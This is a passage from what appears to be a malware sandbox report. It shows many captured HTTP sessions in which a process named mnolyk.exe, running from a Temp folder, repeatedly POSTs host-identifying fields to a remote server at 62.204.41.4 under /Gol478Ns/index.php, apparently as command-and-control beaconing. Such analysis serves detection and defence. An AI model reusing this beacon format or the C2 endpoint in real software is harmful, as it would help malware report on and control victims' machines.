                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:44.405359983 CET240INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        390192.168.2.55008062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:34.462035894 CET591OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:34.524780989 CET | 591 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        391 | 192.168.2.5 | 50081 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:34.695568085 CET | 592 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:34.766392946 CET | 592 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        392 | 192.168.2.5 | 50082 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:34.947433949 CET | 593 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.014060974 CET | 593 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        393 | 192.168.2.5 | 50083 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:35.186608076 CET | 593 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.253365040 CET | 594 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        394 | 192.168.2.5 | 50084 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:35.437222958 CET | 595 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.509721041 CET | 595 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        395 | 192.168.2.5 | 50085 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:35.682373047 CET | 596 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.746413946 CET | 596 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        396 | 192.168.2.5 | 50086 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:35.914582014 CET | 597 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:35.980093002 CET | 597 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        397 | 192.168.2.5 | 50087 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:36.155229092 CET | 598 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:36.220750093 CET | 598 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        398 | 192.168.2.5 | 50088 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:36.403852940 CET | 599 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:36.504537106 CET | 599 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        399 | 192.168.2.5 | 50089 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:36.683034897 CET | 600 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:36.748085976 CET | 600 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        4 | 192.168.2.5 | 49694 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:29.585295916 CET | 204 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:29.649504900 CET | 205 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        40 | 192.168.2.5 | 49730 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:44.596889973 CET | 241 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:44.663312912 CET | 241 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        400 | 192.168.2.5 | 50090 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:36.931057930 CET | 601 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:36.995206118 CET | 601 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        401 | 192.168.2.5 | 50091 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:37.165425062 CET | 602 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:37.233617067 CET | 602 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        402 | 192.168.2.5 | 50092 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:37.397614002 CET | 602 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:37.461185932 CET | 603 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        403 | 192.168.2.5 | 50093 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:37.648521900 CET | 604 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:37.713578939 CET | 604 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        404 | 192.168.2.5 | 50094 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:37.890736103 CET | 605 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:37.956084013 CET | 605 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        405 | 192.168.2.5 | 50095 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:38.133970976 CET | 606 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:38.208528996 CET | 606 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        406 | 192.168.2.5 | 50096 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:38.394553900 CET | 607 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
